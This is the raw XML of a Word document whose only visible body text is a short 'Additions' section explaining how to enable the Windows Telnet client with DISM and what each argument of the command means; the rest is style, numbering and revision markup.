    <w:p w14:paraId="117FA4F3" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="19F4894D" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="2E0D5CB7" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="1CF220AE" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="15705EB5" w14:textId="331E96DB" w:rsidR="00C511CB" w:rsidRPr="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00C511CB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C511CB">
        <w:lastRenderedPageBreak/>
        <w:t>Additions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDAEE75" w14:textId="7F8CC167" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00C511CB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installing Telnet on Windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A80B244" w14:textId="3E05BFE2" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00C511CB">
      <w:pPr>
        <w:pStyle w:val="codew"/>
      </w:pPr>
      <w:r w:rsidRPr="00C511CB">
        <w:t>dism /online /Enable-Feature /FeatureName:TelnetClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEB1CD3" w14:textId="52417C5B" w:rsidR="00C511CB" w:rsidRPr="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00C511CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C511CB">
        <w:t>dism</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C511CB">
        <w:t xml:space="preserve">: Stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00C511CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deployment Image Servicing and Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00C511CB">
        <w:t xml:space="preserve"> – a Windows tool for managing system images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBDA697" w14:textId="00523253" w:rsidR="00C511CB" w:rsidRPr="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00C511CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C511CB">
        <w:t>/online: Means you're applying the change to the currently running Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ACC3D4" w14:textId="3CEA3341" w:rsidR="00C511CB" w:rsidRPr="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00C511CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C511CB">
        <w:t>/Enable-Feature: Tells DISM to turn on a Windows feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E14EBF" w14:textId="7E8CE1BE" w:rsidR="00C511CB" w:rsidRPr="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00C511CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C511CB">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C511CB">
        <w:t>FeatureName:TelnetClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C511CB">
        <w:t xml:space="preserve">: Specifies the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C511CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Telnet Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00C511CB">
        <w:t>, which allows you to use the telnet command in Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2474E1" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="72C3D823" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="6EF1C887" w14:textId="4CA6E139" w:rsidR="00D3539D" w:rsidRDefault="00D3539D" w:rsidP="00D3539D">
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F0A73" w14:textId="77777777" w:rsidR="00D3539D" w:rsidRDefault="00D3539D" w:rsidP="00D3539D"/>
    <w:p w14:paraId="5E818100" w14:textId="77777777" w:rsidR="00D3539D" w:rsidRPr="00E72BD0" w:rsidRDefault="00D3539D" w:rsidP="00D3539D"/>
    <w:sectPr w:rsidR="00D3539D" w:rsidRPr="00E72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9C1D" w14:textId="77777777" w:rsidR="00160495" w:rsidRDefault="00160495" w:rsidP="00823102">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3193A062" w14:textId="77777777" w:rsidR="00160495" w:rsidRDefault="00160495" w:rsidP="0082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var(--ds-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F0108" w14:textId="77777777" w:rsidR="00160495" w:rsidRDefault="00160495" w:rsidP="00823102">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="09E0B105" w14:textId="77777777" w:rsidR="00160495" w:rsidRDefault="00160495" w:rsidP="0082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ADE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F4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37B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7360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37B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A025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D31DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="265E6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138BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EFD43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D2340"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC0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05B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="611C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92C8A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7CA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7320F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="694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76798"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1EC82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50B65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A472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42F44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBD6D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02E43"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE14F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D24AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98AC7892"/>
    <w:lvl w:ilvl="0" w:tplc="4B6280D2">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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="407E6311"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A1E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E4BDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41FA6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2F0D5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19C4BD5E"/>
    <w:lvl w:ilvl="0" w:tplc="F334AD4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5A7B09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CFDCA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CF5C2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F068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9A6213"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CE2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F1316"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4E44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0B0517"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D63688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B0E67E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="334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84FE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53CACEE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D031320"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF944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4D782B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0EAA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B68C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="470C12F8"/>
    <w:lvl w:ilvl="0" w:tplc="6F70AD9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21BA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF9C0CC8"/>
    <w:lvl w:ilvl="0" w:tplc="49908A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088"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94DC5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22F25"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0D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4741D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4F24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6119FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1FE93CC"/>
    <w:lvl w:ilvl="0" w:tplc="49C2297C">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E743388"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="439897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796010"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4250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9232C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="018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D71EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="279E24EC"/>
    <w:lvl w:ilvl="0" w:tplc="1A4ADED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964DF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59E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446287">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1548645336">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1398168139">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="237592386">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1391032433">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="499083344">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="861937468">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="903445749">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1253708798">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="422647863">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1064570065">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1029143892">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="511073297">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="233394661">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1524399901">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1274241145">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="992029447">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1247883577">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="888808492">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="807012748">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="242883575">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1831361998">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="583418055">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1548907641">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1846823309">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="140579852">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1480539817">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1535073274">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1301770666">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1222212408">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="129518557">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1344740667">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="376204937">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1627664364">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="25568818">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1747874402">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="9663965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03"/>
    <w:rsid w:val="00030DE6"/>
    <w:rsid w:val="00066662"/>
    <w:rsid w:val="00073F25"/>
    <w:rsid w:val="00093FBC"/>
    <w:rsid w:val="000B04B3"/>
    <w:rsid w:val="000B0683"/>
    <w:rsid w:val="000D4D14"/>
    <w:rsid w:val="000E166C"/>
    <w:rsid w:val="000F354D"/>
    <w:rsid w:val="000F399E"/>
    <w:rsid w:val="001050F1"/>
    <w:rsid w:val="0011226B"/>
    <w:rsid w:val="00122F98"/>
    <w:rsid w:val="00160495"/>
    <w:rsid w:val="00180515"/>
    <w:rsid w:val="001920A9"/>
    <w:rsid w:val="00193BAA"/>
    <w:rsid w:val="00197AF3"/>
    <w:rsid w:val="001A128D"/>
    <w:rsid w:val="001B7CEA"/>
    <w:rsid w:val="001C6C48"/>
    <w:rsid w:val="001F076A"/>
    <w:rsid w:val="0020196E"/>
    <w:rsid w:val="00210716"/>
    <w:rsid w:val="00211E6A"/>
    <w:rsid w:val="002259D7"/>
    <w:rsid w:val="00226647"/>
    <w:rsid w:val="00234500"/>
    <w:rsid w:val="002828C8"/>
    <w:rsid w:val="00284903"/>
    <w:rsid w:val="002C08AA"/>
    <w:rsid w:val="002C583A"/>
    <w:rsid w:val="002E4717"/>
    <w:rsid w:val="003274C3"/>
    <w:rsid w:val="0034457E"/>
    <w:rsid w:val="003447BA"/>
    <w:rsid w:val="0035510D"/>
    <w:rsid w:val="00396FF0"/>
    <w:rsid w:val="003D24FC"/>
    <w:rsid w:val="003F4DE1"/>
    <w:rsid w:val="003F5C2F"/>
    <w:rsid w:val="00412609"/>
    <w:rsid w:val="0046337C"/>
    <w:rsid w:val="004676E2"/>
    <w:rsid w:val="00472747"/>
    <w:rsid w:val="0047300F"/>
    <w:rsid w:val="004B2062"/>
    <w:rsid w:val="004B368C"/>
    <w:rsid w:val="004B5F5C"/>
    <w:rsid w:val="004C4221"/>
    <w:rsid w:val="004E3364"/>
    <w:rsid w:val="004E533B"/>
    <w:rsid w:val="00533B07"/>
    <w:rsid w:val="005541C7"/>
    <w:rsid w:val="00556EE0"/>
    <w:rsid w:val="00561B93"/>
    <w:rsid w:val="00564EDA"/>
    <w:rsid w:val="00582FB5"/>
    <w:rsid w:val="005B29AF"/>
    <w:rsid w:val="005C2696"/>
    <w:rsid w:val="005E6DEF"/>
    <w:rsid w:val="005F4509"/>
    <w:rsid w:val="00650D12"/>
    <w:rsid w:val="00680E2E"/>
    <w:rsid w:val="006D0EC1"/>
    <w:rsid w:val="006F0D3F"/>
    <w:rsid w:val="00721C55"/>
    <w:rsid w:val="00736EEA"/>
    <w:rsid w:val="007554F1"/>
    <w:rsid w:val="007F3CED"/>
    <w:rsid w:val="00823102"/>
    <w:rsid w:val="0084378D"/>
    <w:rsid w:val="00843C5A"/>
    <w:rsid w:val="00857FD0"/>
    <w:rsid w:val="0088613E"/>
    <w:rsid w:val="00890C7F"/>
    <w:rsid w:val="008C0880"/>
    <w:rsid w:val="008E786A"/>
    <w:rsid w:val="009134EF"/>
    <w:rsid w:val="00930FE5"/>
    <w:rsid w:val="0093456D"/>
    <w:rsid w:val="009359D1"/>
    <w:rsid w:val="00937CC8"/>
    <w:rsid w:val="00955886"/>
    <w:rsid w:val="00975FBC"/>
    <w:rsid w:val="0098416A"/>
    <w:rsid w:val="009B58C7"/>
    <w:rsid w:val="009D7B11"/>
    <w:rsid w:val="00A44DD5"/>
    <w:rsid w:val="00AA36AC"/>
    <w:rsid w:val="00AE15B0"/>
    <w:rsid w:val="00AF40ED"/>
    <w:rsid w:val="00B9714C"/>
    <w:rsid w:val="00BB02F3"/>
    <w:rsid w:val="00BD324B"/>
    <w:rsid w:val="00C00009"/>
    <w:rsid w:val="00C00DE3"/>
    <w:rsid w:val="00C451E4"/>
    <w:rsid w:val="00C511CB"/>
    <w:rsid w:val="00C57C02"/>
    <w:rsid w:val="00C65D2C"/>
    <w:rsid w:val="00C74A4E"/>
    <w:rsid w:val="00C74B4F"/>
    <w:rsid w:val="00C77F5B"/>
    <w:rsid w:val="00C8472D"/>
    <w:rsid w:val="00CD243B"/>
    <w:rsid w:val="00CD4707"/>
    <w:rsid w:val="00CF6B47"/>
    <w:rsid w:val="00D019B3"/>
    <w:rsid w:val="00D027F7"/>
    <w:rsid w:val="00D25CA5"/>
    <w:rsid w:val="00D31ED5"/>
    <w:rsid w:val="00D3539D"/>
    <w:rsid w:val="00D44578"/>
    <w:rsid w:val="00D479DF"/>
    <w:rsid w:val="00D54354"/>
    <w:rsid w:val="00DC4809"/>
    <w:rsid w:val="00DD7656"/>
    <w:rsid w:val="00DE4C68"/>
    <w:rsid w:val="00DF3154"/>
    <w:rsid w:val="00DF7D3E"/>
    <w:rsid w:val="00E15DDB"/>
    <w:rsid w:val="00E60DFD"/>
    <w:rsid w:val="00E72BD0"/>
    <w:rsid w:val="00E751D8"/>
    <w:rsid w:val="00E82CFD"/>
    <w:rsid w:val="00EA2346"/>
    <w:rsid w:val="00EB5BEB"/>
    <w:rsid w:val="00EE3DA8"/>
    <w:rsid w:val="00EE3DF8"/>
    <w:rsid w:val="00EE644B"/>
    <w:rsid w:val="00EF69A5"/>
    <w:rsid w:val="00F21C4D"/>
    <w:rsid w:val="00F47911"/>
    <w:rsid w:val="00F52460"/>
    <w:rsid w:val="00F87384"/>
    <w:rsid w:val="00FE6514"/>
    <w:rsid w:val="00FF4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CB73"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DF1E4C0A-4434-40C7-8240-8698AA60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9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49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49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9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9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9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9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9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9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9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49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49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49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9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903"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00284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903"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00284903"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00284903"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00284903"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="002849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903"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00284903"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="codeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00E72BD0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeChar">
    <w:name w:val="code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="code"/>
    <w:rsid w:val="00E72BD0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000B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B04B3"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000B04B3"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003274C3"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003274C3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="codew">
    <w:name w:val="code_w"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="codewChar"/>
    <w:qFormat/>
    <w:rsid w:val="003274C3"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codewChar">
    <w:name w:val="code_w Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="codew"/>
    <w:rsid w:val="003274C3"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00930FE5"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0082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02"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0082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02"/>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005C2696"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001A128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317">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="46495106">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="71633702">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
